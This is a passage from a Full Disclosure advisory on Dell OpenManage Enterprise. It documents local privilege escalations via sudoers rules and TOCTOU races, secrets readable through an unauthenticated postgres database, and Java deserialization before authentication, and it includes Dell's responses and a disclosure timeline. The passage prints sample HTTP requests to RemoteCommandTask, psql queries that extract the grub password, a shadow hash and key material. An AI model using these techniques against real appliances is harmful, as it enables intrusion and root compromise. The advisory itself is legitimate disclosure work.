    COPY core.passwordcredential (id, dtype, label, usernameid,
passwordid, domainid, updatedate) FROM stdin;
    2       HashedPasswordCredentialEntity  system  4       3       \N
     2020-07-11 11:24:42.386+00
    1       HashedPasswordCredentialEntity  admin   2       1       \N
     2020-07-11 11:26:14.551+00
    \.

When trying to add a `system` account:

[please use the HTML version at
https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html]

[please use the HTML version at
https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html]

This account doesn't seem to be documented but we were unable to use
it to login into the web service.

Its aim is currently not known.



## Details - Database key stored in the database

The application database key (`DatabaseKey`) is generated randomly
during the installation and is stored inside the database.
It is possible to extract it without authentication:

    COPY core.encryptionkey (id, dtype, bytes) FROM stdin;
    1       DatabaseKey
DHAqjsvpfUh+aRZKLTa6+K+rmHBtcPafoyuIMPTqV3hTUbGTb08ZzZSkF4GYgbPQ
    \.



## Details - Weak permissions on SSL/TLS Key

The TLS key has weak permissions:

    [root@...nmanage-enterprise /]# ls -la /etc/pki/tls/private/localhost.key
    -rw-r--r--. 1 root root 3272 Jul 11  2020 /etc/pki/tls/private/localhost.key

No SELinux protection - this allows any user to read the files.



## Details - Multiple Local Privilege Escalations from `mcsimetricssvc`

The file `/etc/sudoers.d/94_mcsi_metrics` belongs to `mcsimetricssvc`,
as shown below:

    [root@...nmanage-enterprise etc]# ls -la /etc/sudoers.d/94_mcsi_metrics
    -rw-rw-r--. 1 mcsimetricssvc root 847 Sep 25  2020
/etc/sudoers.d/94_mcsi_metrics

This user can just edit this file to get root access using `sudo`.

It is also possible to directly find this weakness by executing
`sudo`, a warning message will appear:

    [root@...nmanage-enterprise ~]# sudo id
    sudo: /etc/sudoers.d/94_mcsi_metrics is owned by uid 1005, should be 0
    uid=0(root) gid=0(root) groups=0(root)

This LPE was silently patched in version 3.6.1.

Futhermore, this user has these (large) sudo privileges:

    %mcsimetricssvc ALL=NOPASSWD:/usr/bin/mount, /usr/bin/cp,
/usr/bin/umount,
/usr/bin/gpg,/opt/dell/mcsi/appliance/scripts/pam/config_user_access.sh,/opt/dell/mcsi/appliance/scripts/port_validation.sh,/opt/dell/mcsi/appliance/scripts/change_timezone.py,/opt/dell/mcsi/appliance/scripts/restore_application.py,/opt/dell/mcsi/appliance/scripts/certificate_tool.py,/opt/dell/mcsi/appliance/scripts/change_hostname.py,/opt/dell/mcsi/appliance/scripts/address_configuration.py,/opt/dell/mcsi/appliance/scripts/current_network_settings.py,
/usr/bin/lscpu,/usr/bin/free,/opt/dell/mcsi/appliance/scripts/ntp_tool.py,/opt/dell/mcsi/appliance/scripts/dump_logs.py,/opt/dell/mcsi/appliance/scripts/change_webconfig.py,/opt/dell/mcsi/appliance/scripts/branding.py,/usr/bin/systemctl,/usr/bin/date,/usr/bin/ntpstat,/usr/sbin/ntpq,/usr/bin/python,/usr/sbin/ntpdc

At least `/usr/bin/mount`, `/usr/bin/cp`, `/usr/bin/gpg`,
`/usr/bin/systemctl` and `/usr/bin/python` can be used to elevate to
root.



## Details - Multiple Local Privilege Escalations from group `mcsitasksvc`

Users belonging to group `mcsitasksvc` can sudo:

    %mcsitasksvc ALL=NOPASSWD:/usr/bin/mount, /usr/bin/cp,
/usr/bin/umount,
/usr/bin/gpg,/opt/dell/mcsi/appliance/scripts/pam/config_user_access.sh,/opt/dell/mcsi/appliance/scripts/port_validation.sh,/opt/dell/mcsi/appliance/scripts/change_timezone.py,/opt/dell/mcsi/appliance/scripts/restore_application.py,/opt/dell/mcsi/appliance/scripts/certificate_tool.py,/opt/dell/mcsi/appliance/scripts/change_hostname.py,/opt/dell/mcsi/appliance/scripts/address_configuration.py,/opt/dell/mcsi/appliance/scripts/virtual_ip_configuration.py,/opt/dell/mcsi/appliance/scripts/current_network_settings.py,
/usr/bin/lscpu,/usr/bin/free,/opt/dell/mcsi/appliance/scripts/ntp_tool.py,/opt/dell/mcsi/appliance/scripts/dump_logs.py,/opt/dell/mcsi/appliance/scripts/change_webconfig.py,/opt/dell/mcsi/appliance/scripts/branding.py,/usr/bin/systemctl,/usr/bin/date,/usr/bin/ntpstat,/usr/sbin/ntpq,/usr/bin/python3,/usr/sbin/ntpdc,/opt/dell/mcsi/appliance/scripts/configureSSHDTimeout.sh,/opt/dell/mcsi/appliance/scripts/resolve.sh,/usr/bin/nmcli
    %mcsitasksvc
ALL=NOPASSWD:/opt/dell/omc/utilities/cifsconfiguration/bin/reset_cifs_password.sh,
/opt/dell/omc/utilities/cifsconfiguration/bin/test_cifs_config.sh,
/usr/bin/smbpasswd, /usr/bin/systemctl

At least `/usr/bin/mount`, `/usr/bin/cp`, `/usr/bin/gpg`,
`/usr/bin/systemctl` and `/usr/bin/python3` can be used to elevate to
root.



## Details - Multiple Local Privilege Escalations from group `tomcat`

Users belonging to group `tomcat` can sudo:

    %tomcat ALL=NOPASSWD:/opt/dell/mcsi/appliance/scripts/ntp_tool.py,/opt/dell/mcsi/appliance/scripts/rsyslog_tool.py,/opt/dell/mcsi/appliance/scripts/change_timezone.py,/opt/dell/mcsi/appliance/scripts/certificate_tool.py,/opt/dell/mcsi/appliance/scripts/change_hostname.py,/opt/dell/mcsi/appliance/scripts/login_iprange.py,/opt/dell/mcsi/appliance/scripts/address_configuration.py,/opt/dell/mcsi/appliance/scripts/current_network_settings.py,/opt/dell/mcsi/appliance/scripts/restore_application.py,/opt/dell/mcsi/appliance/scripts/dump_logs.py,/usr/bin/python3,/opt/dell/mcsi/appliance/scripts/branding.py,/opt/dell/mcsi/appliance/scripts/commandexecutor.sh,/opt/dell/mcsi/appliance/scripts/resolve.sh,/opt/dell/mcsi/appliance/scripts/port_validation.sh,/usr/bin/systemctl,/opt/dell/mcsi/appliance/scripts/change_webconfig.py,/opt/dell/mcsi/appliance/scripts/sysloglogging.py,/usr/bin/date,/usr/bin/ntpstat,/usr/sbin/ntpq,/usr/sbin/ntpdc,/opt/dell/mcsi/appliance/scripts/chassis_nw_settings.py,/
 opt/dell/mcsi/appliance/scripts/virtual_ip_configuration.py
    %tomcat ALL=NOPASSWD:/usr/bin/mount, /usr/bin/cp, /usr/bin/umount,
/var/consoleupdate/unzip_uploadedfile.py

At least `/usr/bin/python3`, `/usr/bin/systemctl`, `/usr/bin/mount`
and `/usr/bin/cp`  can be used to elevate to root.



## Details - Local Privilege Escalation from group `omctui`

Users belonging to group `omctui` can sudo:

    %omctui ALL=NOPASSWD:/usr/bin/systemctl,/usr/sbin/shutdown,/usr/bin/localectl

`/usr/bin/systemctl` can be used to elevate to root.



## Details - Multiple TOCTOUs in "security_tool.sh" shell script

`/opt/dell/mcsi/appliance/scripts/security_tool.sh` contains multiple TOCTOUs:

    [root@...nmanage-enterprise /]# cat
/opt/dell/mcsi/appliance/scripts/security_tool.sh
    [...]
    456 function turnOffRequireRetty
    457 {
    458     echo "turning off RequireRetty"
    459
    460     # make it so the requiretty is commented out.
    461     sed 's/Defaults    requiretty/#Defaults    requiretty/'
/etc/sudoers > /tmp/sudoers.bk
    462     mv /tmp/sudoers.bk /etc/sudoers
    463     chmod 0440 /etc/sudoers
    464 }

In line 461, no check is done on `/tmp/sudoers.bk` - so the file may
already exist with attacker's rights.
Race condition in line 462 - an attacker previously controlling
`/tmp/sudoers.bk` will overwrite `/etc/sudoers`
with its own policies, resulting in a privilege escalation.

This race condition is now located in line 168 in version 3.6.1.

And here:

    505     local targets="/usr/bin/python3"
    506     targets="${targets},${THIS_DIR}/change_admin_password.sh"
    507     targets="${targets},/usr/sbin/passwd"
    508     targets="${targets},${THIS_DIR}/change_timezone.py"
    509     targets="${targets},${THIS_DIR}/certificate_tool.py"
    510
    511     # remove existing tomcat permissions from the sudoesrs file
    512      sed 's/%admin ALL=NOPASSWD:.*$//' /etc/sudoers > /tmp/sudoers.bk
    513     mv /tmp/sudoers.bk /etc/sudoers
    514     chmod 0440 /etc/sudoers
    515
    516      # add new tomcat permissions to the sudoers file
    517      echo "%admin ALL=NOPASSWD:${targets}" >> /etc/sudoers


Race condition in line 513 - an attacker controlling `/tmp/sudoers.bk`
will overwrite `/etc/sudoers`
with its own policies, resulting in a privilege escalation.

This race condition is now located in line 220 in version 3.6.1.



## Details - Incorrect access for tomcat

The script `security_tool.sh` contains interesting settings for the
tomcat user, in the function `configureShadowAccess`:

    [root@...nmanage-enterprise /]# cat
/opt/dell/mcsi/appliance/scripts/security_tool.sh
    [...]
    466 # this allows rest/shiro to authenticate admin user from
tomcat using the pam database
    467 function configureShadowAccess
    468 {
    469     if ! $(ls -la /etc/shadow | grep -q shadow-readers); then
    470         echo "configuring shadow access"
    471         groupadd shadow-readers
    472         usermod -a -G shadow-readers tomcat               <--
tomcat added to group `shadow-readers`
    473         chown root:shadow-readers /etc/shadow             <--
non-standard permissions for /etc/shadow
    474         chmod 640 /etc/shadow
    475         service systemd-logind restart
    476     else
    477         echo "shadow access already configured"
    478     fi
    479 }

This will allow the `tomcat` user to read the `/etc/shadow` file.

This function is not called in version 3.5 and 3.6.1 but may have been
used before:

    573 function configureAccounts
    574 {
    575     #configureShadowAccess

This function is located in line 174 in version 3.6.1.



## Details - Grub password stored in postgres, without authentication
for local user

The grub password is located in the file `/etc/grub.d/40_custom`.

This file is generated by
`/opt/dell/mcsi/appliance/scripts/set_grub_password.sh`:


    [...]
    12   pwd="$(/usr/bin/psql -qtAX -U core_admin -d enterprisedb -c
'select guid from core.application_info')"
    [...]
    28       sed -i "s/password root.*/password root $pwd/g"
/etc/grub.d/40_custom
    29       /usr/sbin/grub2-mkconfig -o /boot/grub2/grub.cfg
    30       echo GRUB password is updated
    [...]

Even if `/etc/grub.d/40_custom` is 755, it is impossible to read the
file because `/etc/grub.d` is 700 `root:root`.

    [root@...nmanage-enterprise lpe-priv8-3/]# ls -la /etc/grub.d/40_custom
    -rwxr-xr-x. 1 root root 288 May 16 04:07 /etc/grub.d/40_custom
    [root@...nmanage-enterprise lpe-priv8-3/]# ls -la /etc/grub.d | grep ' \.$'
    drwx------.  2 root root  4096 Sep 30  2020 .

But it is possible to extract the grub password from the auth-less
local postgres database:

    sh-4.2$ /usr/bin/psql -qtAX -U core_admin -d enterprisedb -c
'select guid from core.application_info'
    09b50d53-189c-221c-7996-1c0ee1279201

The password can be confirmed by reading `/etc/grub.d/40_custom`:

    [root@...nmanage-enterprise /]# tail -n 1 /etc/grub.d/40_custom
    password root 09b50d53-189c-221c-7996-1c0ee1279201



## Details - Pre-auth and post-auth Java Deserializations

The solution uses `jackson` and `ObjectMapper` to read
attacker-controlled json inputs.

It appears authentification doesn't really work when sending
attacker-controlled data on API endpoints:

- - sending valid authentication cookies and well-formed json/xml will
result in a 200 ok
- - sending valid authentication cookies and bad-formed json/xml will
result in deserialization errors or jackson parsing errors
- - sending well-formed json/xml without valid authentication cookies
will result in a 400 bad request
- - sending bad-formed json/xml without valid authentication cookies
will result in deserialization errors or jackson parsing errors

The authentication system appears to be broken as it parses
attacker-controlled data before checking the authentication.

Sending correct data will trigger the authentication:

    kali# wget -O- --no-check-certificate --post-data
'{"targets":["1"],"command":"ls","operation":"REMOTE_SSH_EXEC"}'
--header "Content-Type: application/json;charset=utf-8"
https://192.168.1.100/omc/api/Console/RemoteCommandTask
    HTTP request sent, awaiting response... 400 Bad Request
    2021-05-16 12:57:17 ERROR 400: Bad Request.

- From the logs:

    [ERROR] 2021-05-16 12:57:15.158 [ajp-bio-8009-exec-1]
JobsController -
org.springframework.web.client.HttpClientErrorException: 401
Unauthorized

Now, by replacing the targets field, "1" becomes "a", it is possible
to create deserialization errors
while sending incorrect inputs while creating a RemoteCommandTask:

    POST /omc/api/Console/RemoteCommandTask HTTP/1.1
    Host: 192.168.1.100
    Content-Type: application/json;charset=utf-8
    Content-Length: 62

    {"targets":["a"],"command":"ls","operation":"REMOTE_SSH_EXEC"}

Or with `wget`:

    kali# wget -O- --no-check-certificate --post-data
'{"targets":["a"],"command":"ls","operation":"REMOTE_SSH_EXEC"}'
--header "Content-Type: application/json;charset=utf-8"
https://192.168.1.100/omc/api/Console/RemoteCommandTask
    HTTP request sent, awaiting response... 500 Internal Server Error
    2021-05-16 12:58:25 ERROR 500: Internal Server Error.

And from the logs, no more "401 Unauthorized" but some deserialization errors:

- From `/var/log/dell/mcsi/tomcat/application.log`:

    [ERROR] 2021-05-16 12:58:39.554 [ajp-bio-8009-exec-4]
BaseController -
org.springframework.http.converter.HttpMessageNotReadableException:
JSON parse error: Cannot deserialize value of type `java.lang.Integer`
from String "a": not a valid Integer value; nested exception is
com.fasterxml.jackson.databind.exc.InvalidFormatException: Cannot
deserialize value of type `java.lang.Integer` from String "a": not a
valid Integer value
     at [Source: (PushbackInputStream); line: 1, column: 13] (through
reference chain:
com.dell.enterprise.model.omc.RemoteCommandTask["targets"]->java.util.ArrayList[0])
    org.springframework.http.converter.HttpMessageNotReadableException:
JSON parse error: Cannot deserialize value of type `java.lang.Integer`
from String "a": not a valid Integer value; nested exception is
com.fasterxml.jackson.databind.exc.InvalidFormatException: Cannot
deserialize value of type `java.lang.Integer` from String "a": not a
valid Integer value
     at [Source: (PushbackInputStream); line: 1, column: 13] (through
reference chain:
com.dell.enterprise.model.omc.RemoteCommandTask["targets"]->java.util.ArrayList[0])
     [100s of lines]

So it appears this input is deserialized before the authentication
process is done.

We saw this behavior - deserialization or checking of validity of JSON
using jackson without authentication -
in several web forms present in the solution, accepting JSON or XML,
mainly before any authentication.

After some tests, we found 1 form that apparently checks the authentication,
but it is still possible to generate deserialization errors (post-auth):

    POST /core/api/Console/oidc/checkRegistration HTTP/1.1
    Host: 192.168.1.100
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0)
Gecko/20100101 Firefox/78.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    X-Requested-With: managementConsole
    Content-Length: 24
    Origin: https://192.168.1.100
    Connection: close
    Referer: https://192.168.1.100/core/console/console.html
    Cookie: X-Auth-Token=f544973e-4c0e-4522-9b8a-a65498ebccfc

    {"oidcServerIds":[a1]}

- From `/var/log/dell/mcsi/tomcat/application.log`:

    [ERROR] 2021-05-16 13:12:15.356 [ajp-bio-8009-exec-4]
BaseController -
org.springframework.http.converter.HttpMessageNotReadableException:
JSON parse error: Unrecognized token 'a1': was expecting (JSON String,
Number, Array, Object or token 'null', 'true' or 'false'); nested
exception is com.fasterxml.jackson.databind.JsonMappingException:
Unrecognized token 'a1': was expecting (JSON String, Number, Array,
Object or token 'null', 'true' or 'false')
     at [Source: (PushbackInputStream); line: 1, column: 24] (through
reference chain:
com.dell.enterprise.model.ui.OIDCRegistrationStatusList["oidcServerIds"])
    org.springframework.http.converter.HttpMessageNotReadableException:
JSON parse error: Unrecognized token 'a1': was expecting (JSON String,
Number, Array, Object or token 'null', 'true' or 'false'); nested
exception is com.fasterxml.jackson.databind.JsonMappingException:
Unrecognized token 'a1': was expecting (JSON String, Number, Array,
Object or token 'null', 'true' or 'false')
    [...]
     at Caused by:
com.fasterxml.jackson.databind.JsonMappingException: Unrecognized
token 'a1': was expecting (JSON String, Number, Array, Object or token
'null', 'true' or 'false')
    [...]
    	at com.fasterxml.jackson.databind.deser.BeanDeserializerBase.wrapAndThrow(BeanDeserializerBase.java:1714)
~[jackson-databind-2.10.3.jar:2.10.3]
    	at com.fasterxml.jackson.databind.deser.BeanDeserializer.deserializeFromObject(BeanDeserializer.java:371)
~[jackson-databind-2.10.3.jar:2.10.3]
    	at com.fasterxml.jackson.databind.deser.BeanDeserializer.deserialize(BeanDeserializer.java:159)
~[jackson-databind-2.10.3.jar:2.10.3]
    	at com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4218)
~[jackson-databind-2.10.3.jar:2.10.3]
    	at com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3267)
~[jackson-databind-2.10.3.jar:2.10.3]
      [...]
    	at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserialize(CollectionDeserializer.java:277)
~[jackson-databind-2.10.3.jar:2.10.3]
    	at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserialize(CollectionDeserializer.java:245)
~[jackson-databind-2.10.3.jar:2.10.3]
    	at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserialize(CollectionDeserializer.java:27)
~[jackson-databind-2.10.3.jar:2.10.3]
    	at com.fasterxml.jackson.databind.deser.impl.FieldProperty.deserializeAndSet(FieldProperty.java:138)
~[jackson-databind-2.10.3.jar:2.10.3]
    	at com.fasterxml.jackson.databind.deser.BeanDeserializer.deserializeFromObject(BeanDeserializer.java:369)
~[jackson-databind-2.10.3.jar:2.10.3]
    	at com.fasterxml.jackson.databind.deser.BeanDeserializer.deserialize(BeanDeserializer.java:159)
~[jackson-databind-2.10.3.jar:2.10.3]
    	at com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4218)
~[jackson-databind-2.10.3.jar:2.10.3]
    	at com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3267)
~[jackson-databind-2.10.3.jar:2.10.3]
    	at org.springframework.http.converter.json.AbstractJackson2HttpMessageConverter.readJavaType(AbstractJackson2HttpMessageConverter.java:237)
~[spring-web-4.3.28.RELEASE.jar:4.3.28.RELEASE]
      [...]

Due to the lack of interesting java gadgets, we didn't manage to
exploit these deserialization errors.

These pre-auth and post-auth Java deserializations have been silently
patched in version 3.6.1.



## Details - Idrac User

When installing the appliance, an idrac user will be created with a
random password:

    [root@...nmanage-enterprise /]# cat /etc/shadow
    [...]
    idrac:$6$QtG/5PHz$1ZW7aSUeLJ6mlQM/sO/g7RLxKNUQrTwksmkJH9/meYkPTlgSvXLrR6CUikYzDg27bvprfm.EgimjX1e3yaxzC1:18763:0:99999:7:::
    [root@...nmanage-enterprise /]# cat /etc/passwd
    [...]
    idrac:x:1008:1016::/shared/dell/omc/cifs/idrac:/bin/false

This user may be for samba sharing functionality - we didn't success
to use this functionality
from the management interface - maybe it will be possible to configure
it in the next versions.

Interesting files are:

- - /etc/samba/smb.conf
- - /var/lib/samba/private/passdb.tdb
- - /var/lib/samba/private/secrets.tdb

It is possible to extract configurations with `tdbtool`:
`tdbtool /var/lib/samba/private/secrets.tdb dump` and `tdbtool
/var/lib/samba/private/passdb.tdb dump`



## Researcher comments on Vendor Response

1 point has been considered as a vulnerability by the vendor
("Remote Auth Bypass with 2 pre-auth RCEs in docker instances") because
the attacker is not supposed to get a shell (e.g. with a command injection
or java deserialization) or to access postgres running on the appliance
(via a shell or via the network).

Interestingly, Dell confirmed this vulnerability that is in fact a chain
of multiple "no-impact" vulnerabilities (lack of authentication for postgres,
command execution in redis and in postgres, R/W access to the postgres).

Other issues have not been considered having security impacts.
Dell confirmed postgres does not use authentication and there is no
security impact in a normal situation.

Futhermore, this solution has an history of command injections -
nonetheless the threat model doesn't appear to include command injections
("No shell access or other ingress points available for use.").

2 vulnerabilities have been silently patched by the vendor, one DSA
will be published (java deserialization).



## Vendor Response

The vendor provided an impact assessment and explanations, as shown below:

1. Hardcoded ActiveMQ Credentials -> No impact
ActiveMQ credentials are not used in the appliance. File artifacts
will be removed in a future release and are unused in Dell EMC
OpenManage Enterprise (OME) and Dell EMC OpenManage Enterpise-Modular
(OME-M).
Also, note that the ActiveMQ web console is disabled within OME.  In
addition, as confirmed by the researcher, the firewall blocks incoming
access to the relevant ports (46403 / 61616) and SELinux policies
prevent users from reading these files.

2. Harcdoded ActiveMQ credentials for JMX -> No impact
ActiveMQ JMX configuration is disabled. File artifacts will be removed
in a future release and are unused in OME and OME-M. SELinux policies
prevent regular users from reading the contents of these files.

3. Hardcoded ActiveMQ Keystore + password for keystore file (in
jetty.xml) -> No impact
ActiveMQ keystore is not used in OME/OME-M. These artifacts will be
removed in a future release.
SELinux policies prevent regular user read access.

4. Hardcoded JDBC passwords -> No impact
DB configured to allow access only from localhost. Also, the passwords
indicated by the researcher are not used in OME / OME-M. In addition,
(in OME 3.5 and later) SELinux policies add another layer of read
access protection to the files
with these passwords.

5. Hardcoded passwords for core_admin and replicator -> No impact
DB is configured to only allow access from localhost. The passwords
indicated are not used in OME or OME-M and will be removed in a future
release.

6. KeyStore using hardcoded Key -> No impact
SELinux policies and current mitigation in place prevent file system access.

7. Permissive ACL for Postgres -> No impact
The attack vectors of shell access / ingress via Docker are not
available to users - Docker path shut off in original design of
product.

8. Local Privilege Escalation (as postgres) inside postgres docker -> No impact
The attack vectors of shell access / ingress via Docker are not
available to users - Docker path shut off in original design of
product.

9. Remote Auth Bypass with 2 pre-auth RCEs in docker instances -> Impacted
Remediation available in OME version 3.6.2 and OME-M 1.30.10, more
information in Dell Security Advisory -
DSA-2021-113 (https://www.dell.com/support/kbdoc/000189673)

10. Undocumented `system` account -> No impact
User cannot log in to account.

11. Database key stored in the database -> No impact
Postgres is configured to allow access from internal appliance
services - no security impact

12. Weak permission on SSL/TLS Key -> No impact
No shell access for use in exploitation.
As an additional layer of defense, SELinux policies will be reviewed
and updated in future releases.

13. Multiple Local Privilege Escalations from `mcsimetricssvc` -
partially silently patched in version 3.6.1 -> No impact
No shell access or other ingress points available for use.

14. Multiple Local Privilege Escalations from group `mcsitasksvc` -> No impact
No shell access or other ingress points available for use.

15. Multiple Local Privilege Escalations from group `tomcat` -> No impact
No shell access or other ingress points available for use.

16. Local Privilege Escalation from group `omctui` -> No impact
No shell access or other ingress points available for use.

17. Multiple TOCTOUs in "security_tool.sh" shell script -> No impact
Mitigation in place to block shell access by default.

18. Incorrect access for tomcat -> No impact
Debug level script is not used in OME/OME-M and will be removed in
future releases.

19. Grub password stored in postgres, without authentication for local
user -> No impact
Access to postgres for password is only available to users who already
have hypervisor admin privileges.

20. Pre-auth and post-auth Java Deserializations - silently patched in
version 3.6.1 -> No impact
Found in prior internal security audit - issue mitigated in version
3.6.1, more information in Dell Security Advisory - DSA-2021-113
(https://www.dell.com/support/kbdoc/000189673).

21. Idrac User -> No impact
These are credentials to access an internal CIFS share / not a user
that can log in to OME. The passwords are rotated on a time interval
(not configurable) and handed out by OME to clients who in turn need
access to the internal CIFS share. Binary content that can be
introduced on this share is limited to DUPS which are signed /
signature verified by the iDRAC and other entities prior to flashing.
Non-binary content is the SCP profile that is used to configure
systems. The ability to invoke operations that would access the CIFS
share / use content on it is relegated to authenticated high
privileged OME users (admin / Device Manager roles)



## Report Timeline

* July, 2020: Vulnerabilities found and this advisory was written.
Research took =~ 4 days.
* May 14, 2021: Found an interesting tweet about dbutil_2_3.sys
* May 16, 2021: Verification on version 3.5. New vulnerabilities
found, advisory was rewritten.
* June 26, 2021: Verification on version 3.6.1.
* June 26, 2021: Advisory sent to Dell
* June 28, 2021: Dell attributes PSRC-15668
* Jul 14, 2021: Dell replies it is doing final reviews of their
advisory and ask to coordinate disclosure to July 19
* Jul 16, 2021: Pierre replies confirms July 19 and asks Dell to
confirm the "Vendor Response" text
* Jul 19, 2021: A public advisory is sent to security mailing lists.



## Credits

These vulnerabilities were found by Pierre Kim (@PierreKimSec) and
Alexandre Torres (@AlexTorSec).



## References

https://pierrekim.github.io/advisories/2021-dell-openmanage-enterprise-0x00.txt

https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmD1OmYACgkQxD4O2n2T
Lbw2HA/9FcwRyBfvOZT+8a5kfvY2q0doMkSp4UIBHw5NENSbjRsnOs2VYt/cN+zb
YNw1MD3SWVd0r2c3U2jbAT0REppNDa4m5A83TKsbzunadBnEoJTDpjBp0TXnyJ9c
M0ghSi0EvvjGm0DmjOD9nUsYpJZftJWuVsTqTeuhSyFyvxaMUHUzKiTcZQS1gKiw
+eeseUhlzFilUicz6IUeV7e5zGZ/lKun8viurPXaxyLY29yWmV77tKCBuP16G60R
Z4JS6I5EOiYsupxckLsY1IRsrmQ3P7SymjEygxwWiQpOdRwu8soe+bXYCruEYG8V
ff6i9pNkgvkdLg3Jm9usXDwBj3+vy0zqHC742p+FeUwgPtLLqvY90GDmw7VkdUNF
KUbeVSfzPB7p0xaxGQ+egxyrOIZBHRBIl29vvP7hdeKvGjyo7035x0Xs04n6kaQM
T71m1qSb+LU6Fd5tm8rD2yXe9e6REUI0Xas7sRPP3WWvYyJNStR9v/bURUdg6GtE
kw7w3siyfGCgoQ8Ct1qWz+v9MCj1anmMih5SI2cm/8WUa7Kk3Zgq0F6tqzlhtXM8
52lUZn2g0gZiXiQ34CxEm9jbslbltGVLDDWV6WVzdmpQN/gsWQ6agPCEW/+KPyIj
+ruWritELTnbKdosXfCV0wRxHxEOEIwl9UQEhOan/hFsjsqMDbs=
=rTFH
-----END PGP SIGNATURE-----

-- 
Pierre Kim
pierre.kim.sec@...il.com
@PierreKimSec
https://pierrekim.github.io/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ